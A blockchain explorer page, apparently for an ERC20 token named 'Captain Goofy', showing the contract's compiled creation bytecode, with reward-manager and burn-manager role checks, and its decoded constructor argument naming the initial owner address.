001000411000000000010043f0000000101000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b0000000702000029000000000020043f000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000101041a000000060310006c0000030d0000813d000000400100043d00000064021000390000019d03000041000000000032043500000044021000390000019e030000410000000000320435000000240210003900000025030000390000000000320435000001940200004100000000002104350000000402100039000000200300003900000000003204350000016a0010009c0000016a0100804100000040011002100000019f011001c7000005a7000104300000000001000416000000000001004b000000490000c13d0000000201000039000000000101041a000000800010043f0000019801000041000005a60001042e0000000001000416000000000001004b000000490000c13d0000000403000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f0000000100600190000002f40000613d000001a501000041000000000010043f0000002201000039000000040010043f000001a601000041000005a7000104300000019401000041000000800010043f0000002001000039000000840010043f000000a40010043f000001aa01000041000000c40010043f000001ab01000041000005a700010430000000800010043f000000000005004b000002fd0000c13d000001b101200197000000a00010043f000000000004004b000000c001000039000000a001006039000003460000013d000000000030043f000000020020008c0000033b0000813d00000020010000390000034a0000013d000000000009004b0000000001000019000003060000613d00000000010a04330000000302900210000001b00220027f000001b002200167000000000121016f0000000102900210000000000121019f000003b50000013d0000000001000411000000070200002905a5052f0000040f000000400100043d000000010200003900000000002104350000016a0010009c0000016a0100804100000040011002100000019c011001c7000005a60001042e0000017302200197000000000262019f000000000021041b00000000010004140000016a0010009c0000016a01008041000000c00110021000000174011001c70000800d020000390000000303000039000001750400004105a5059b0000040f0000000100200190000000490000613d0000000001000019000005a60001042e000000070000006b000003700000c13d000000400100043d00000044021000390000019903000041000000000032043500000024021000390000001f030000390000000000320435000001940200004100000000002104350000000402100039000000200300003900000000003204350000016a0010009c0000016a0100804100000040011002100000019a011001c7000005a700010430000001a30200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b0000033d0000413d000000c001300039000000610110008a000001af01100197000001a40010009c000003b90000213d0000008001100039000700000001001d000000400010043f000000800200003905a504a70000040f000000070200002900000000012100490000016a0010009c0000016a0100804100000060011002100000016a0020009c0000016a020080410000004002200210000000000121019f000005a60001042e0000000701000029000000000010043f000000200000043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000301041a000000000003004b000004130000c13d000000400100043d0000004402100039000001a803000041000000000032043500000024021000390000001503000039000003300000013d0000000201000039000000000201041a0000000603000029000000000032001a000004600000413d0000000002320019000000000021041b0000000701000029000000000010043f000000200000043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000201041a00000006030000290000000002320019000000000021041b000000400100043d00000000003104350000016a0010009c0000016a01008041000000400110021000000000020004140000016a0020009c0000016a02008041000000c002200210000000000112019f00000172011001c70000800d020000390000000303000039000001790400004100000000050000190000000706000029000003230000013d000000010320008a00000005033002700000000004310019000000200300003900000001044000390000000607000029000000030800003900000000059300190000000005050433000000000051041b00000020033000390000000101100039000000000041004b000003a00000c13d0000000000a2004b000003b10000813d0000000302a00210000000f80220018f000001b00220027f000001b00220016700000000039300190000000003030433000000000223016f000000000021041b0000000101a0021000000001011001bf00000005040000390000000705000029000000000018041b0000000009070433000001710090009c000003bf0000a13d000001a501000041000000000010043f0000004101000039000000040010043f000001a601000041000005a7000104300000000408000039000000000108041a000000010010019000000001031002700000007f0330618f0000001f0030008c00000000020000390000000102002039000000000121013f0000000100100190000002e50000c13d000000200030008c000003ec0000413d000400000003001d000500000009001d000000000080043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000172011001c7000080100200003905a505a00000040f0000000100200190000000490000613d00000005090000290000001f029000390000000502200270000000200090008c0000000002004019000000000301043b00000004010000290000001f01100039000000050110027000000000011300190000000002230019000000000012004b000000050400003900000007050000290000000408000039000003ec0000813d000000000002041b0000000102200039000000000012004b000003e80000413d0000001f0090008c000004000000a13d000500000009001d000000000080043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000172011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000200200008a0000000502200180000000000101043b000004290000c13d00000020030000390000000606000029000004360000013d000000000009004b0000000001000019000004040000613d00000000010504330000000302900210000001b00220027f000001b002200167000000000121016f0000000102900210000000000121019f000004450000013d0000000701000029000000000200041105a5052f0000040f00000007010000290000000602000029000000050300002905a504bc0000040f000003100000013d00000007010000290000000602000029000500000003001d05a504bc0000040f000000400100043d000000050200002900000000002104350000016a0010009c0000016a01008041000000400110021000000000020004140000016a0020009c0000016a02008041000000c002200210000000000112019f00000172011001c70000800d020000390000000303000039000001a70400004100000007050000290000000606000029000003230000013d000000010320008a0000000503300270000000000431001900000020030000390000000104400039000000060600002900000000056300190000000005050433000000000051041b00000020033000390000000101100039000000000041004b0000042f0000c13d0000000505000029000000000052004b000004410000813d0000000302500210000000f80220018f000001b00220027f000001b00220016700000000036300190000000003030433000000000223016f000000000021041b000000010150021000000001011001bf00000005040000390000000408000039000000000018041b00000000010004110000016d06100197000000000104041a0000017302100197000000000262019f000000000024041b00000000020004140000016d051001970000016a0020009c0000016a02008041000000c00120021000000174011001c70000800d020000390000000303000039000001750400004105a5059b0000040f00000001002001900000000301000029000000490000613d0000016d021001980000032a0000613d000700000002001d0000000201000039000000000201041a000001760220009c000004660000413d000001a501000041000000000010043f0000001101000039000000040010043f000001a601000041000005a700010430000000000021041b0000000701000029000000000010043f000000200000043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000000490000613d000000000101043b000000000201041a000001760220009a000000000021041b0000017801000041000000400200043d00000000001204350000016a0020009c0000016a02008041000000400120021000000000020004140000016a0020009c0000016a02008041000000c002200210000000000121019f00000172011001c70000800d02000039000000030300003900000179040000410000000005000019000000070600002905a5059b0000040f00000003010000290000000100200190000000490000613d05a504920000040f0000002001000039000001000010044300000120000004430000017a01000041000005a60001042e0000016d061001970000000501000039000000000201041a0000017303200197000000000363019f000000000031041b00000000010004140000016d052001970000016a0010009c0000016a01008041000000c00110021000000174011001c70000800d020000390000000303000039000001750400004105a5059b0000040f0000000100200190000004a50000613d000000000001042d0000000001000019000005a70001043000000020030000390000000004310436000000003202043400000000002404350000004001100039000000000002004b000004b60000613d000000000400001900000000054100190000000006430019000000000606043300000000006504350000002004400039000000000024004b000004af0000413d000000000321001900000000000304350000001f02200039000001af022001970000000001210019000000000001042d0004000000000002000400000003001d0000016d01100198000005070000613d0002016d0020019c000005110000613d000300000001001d000000000010043f000000200000043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000005050000613d000000000101043b000000000101041a00010004001000740000051b0000413d0000000301000029000000000010043f000000200000043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000005050000613d000000000101043b0000000102000029000000000021041b0000000201000029000000000010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f0000000100200190000005050000613d000000000101043b000000000201041a00000004030000290000000002320019000000000021041b000000400100043d00000000003104350000016a0010009c0000016a01008041000000400110021000000000020004140000016a0020009c0000016a02008041000000c002200210000000000112019f00000172011001c70000800d02000039000000030300003900000179040000410000000305000029000000020600002905a5059b0000040f0000000100200190000005050000613d000000000001042d0000000001000019000005a700010430000000400100043d0000006402100039000001b60300004100000000003204350000004402100039000001b703000041000000000032043500000024021000390000002503000039000005240000013d000000400100043d0000006402100039000001b40300004100000000003204350000004402100039000001b503000041000000000032043500000024021000390000002303000039000005240000013d000000400100043d0000006402100039000001b20300004100000000003204350000004402100039000001b3030000410000000000320435000000240210003900000026030000390000000000320435000001940200004100000000002104350000000402100039000000200300003900000000003204350000016a0010009c0000016a0100804100000040011002100000019f011001c7000005a70001043000030000000000020000016d01100198000005680000613d000200000003001d0003016d0020019c000005720000613d000100000001001d000000000010043f0000000101000039000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f00000001002001900000000303000029000005660000613d000000000101043b000000000030043f000000200010043f00000000010004140000016a0010009c0000016a01008041000000c00110021000000177011001c7000080100200003905a505a00000040f00000003060000290000000100200190000005660000613d000000000101043b0000000202000029000000000021041b000000400100043d00000000002104350000016a0010009c0000016a01008041000000400110021000000000020004140000016a0020009c0000016a02008041000000c002200210000000000112019f00000172011001c70000800d020000390000000303000039000001b804000041000000010500002905a5059b0000040f0000000100200190000005660000613d000000000001042d0000000001000019000005a700010430000000400100043d0000006402100039000001bb0300004100000000003204350000004402100039000001bc030000410000000000320435000000240210003900000024030000390000057b0000013d000000400100043d0000006402100039000001b90300004100000000003204350000004402100039000001ba030000410000000000320435000000240210003900000022030000390000000000320435000001940200004100000000002104350000000402100039000000200300003900000000003204350000016a0010009c0000016a0100804100000040011002100000019f011001c7000005a7000104300000016a0010009c0000016a0100804100000040011002100000016a0020009c0000016a020080410000006002200210000000000112019f00000000020004140000016a0020009c0000016a02008041000000c002200210000000000112019f00000174011001c7000080100200003905a505a00000040f0000000100200190000005990000613d000000000101043b000000000001042d0000000001000019000005a7000104300000059e002104210000000102000039000000000001042d0000000002000019000000000001042d000005a3002104230000000102000039000000000001042d0000000002000019000000000001042d000005a500000432000005a60001042e000005a70001043000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000001ffffffe000000000000000000000000000000000000000000000000000000000ffffffe0000000000000000000000000ffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffffffffffbf4361707461696e20476f6f667900000000000000000000000000000000000000476f6f6679000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff0200000000000000000000000000000000000020000000000000000000000000ffffffffffffffffffffffff000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000008be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0ffffffffffffffffffffffffffffffffffffffff3e2129ca8b21f1b9a000000002000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000000c1ded63574de0e4660000000ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef000000020000000000000000000000000000004000000100000000000000000000000000000000000000000000000000000000000000000000000000715018a500000000000000000000000000000000000000000000000000000000a457c2d600000000000000000000000000000000000000000000000000000000b933ceab00000000000000000000000000000000000000000000000000000000b933ceac00000000000000000000000000000000000000000000000000000000dd62ed3e00000000000000000000000000000000000000000000000000000000f2fde38b00000000000000000000000000000000000000000000000000000000a457c2d700000000000000000000000000000000000000000000000000000000a9059cbb0000000000000000000000000000000000000000000000000000000095d89b400000000000000000000000000000000000000000000000000000000095d89b4100000000000000000000000000000000000000000000000000000000a3bdc18900000000000000000000000000000000000000000000000000000000715018a6000000000000000000000000000000000000000000000000000000008da5cb5b0000000000000000000000000000000000000000000000000000000026f65a1600000000000000000000000000000000000000000000000000000000313ce56600000000000000000000000000000000000000000000000000000000313ce56700000000000000000000000000000000000000000000000000000000395093510000000000000000000000000000000000000000000000000000000070a082310000000000000000000000000000000000000000000000000000000026f65a170000000000000000000000000000000000000000000000000000000027fc84a30000000000000000000000000000000000000000000000000000000018160ddc0000000000000000000000000000000000000000000000000000000018160ddd0000000000000000000000000000000000000000000000000000000023b872dd0000000000000000000000000000000000000000000000000000000006fdde0300000000000000000000000000000000000000000000000000000000095ea7b308c379a0000000000000000000000000000000000000000000000000000000004f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000084000000800000000000000000000000000000000000000000000000000000002000000080000000000000000045524332303a206d696e7420746f20746865207a65726f206164647265737300000000000000000000000000000000000000006400000000000000000000000043616c6c6572206973206e6f74206120726577617264206d616e6167657200000000000000000000000000000000000000000020000000000000000000000000207a65726f00000000000000000000000000000000000000000000000000000045524332303a2064656372656173656420616c6c6f77616e63652062656c6f7700000000000000000000000000000000000000840000000000000000000000004275726e4d616e616765720000000000000000000000000000000000000000000200000000000000000000000000000000000060000000000000000000000000b710f7d3e79cb091613cfea70444ea824ad23f2b1297bdea427bc6f097e346a88a35acfbc15ff81a39ae7d344fd709f28e8600b4aa8c65c6b64bfe7fe36bd19b000000000000000000000000000000000000000000000000ffffffffffffff7f4e487b71000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024000000000000000000000000857ac1c9e97cc66ecae5f524c9c611463ae748b85af3ca454a5ec4d7d341924d4e6f20746f6b656e7320746f207472616e73666572000000000000000000000043616c6c6572206973206e6f742061206275726e206d616e61676572000000004f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657200000000000000000000000000000000000000640000008000000000000000005265776172644d616e616765720000000000000000000000000000000000000045524332303a20696e73756666696369656e7420616c6c6f77616e6365000000c2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f71f85bffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00616c616e6365000000000000000000000000000000000000000000000000000045524332303a207472616e7366657220616d6f756e7420657863656564732062657373000000000000000000000000000000000000000000000000000000000045524332303a207472616e7366657220746f20746865207a65726f2061646472647265737300000000000000000000000000000000000000000000000000000045524332303a207472616e736665722066726f6d20746865207a65726f2061648c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925737300000000000000000000000000000000000000000000000000000000000045524332303a20617070726f766520746f20746865207a65726f206164647265726573730000000000000000000000000000000000000000000000000000000045524332303a20617070726f76652066726f6d20746865207a65726f2061646400000000000000000000000000000000000000000000000000000000000000008a6ebe8e783bfe1517dc86d05fc88e9f49b5090d17f35e1a413a31f24b9ebe59

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000e784109Ef11e3B695bE47fee476d12792802bFF6

-----Decoded View---------------
Arg [0] : initialOwner (address): 0xe784109Ef11e3B695bE47fee476d12792802bFF6

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000e784109Ef11e3B695bE47fee476d12792802bFF6


[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.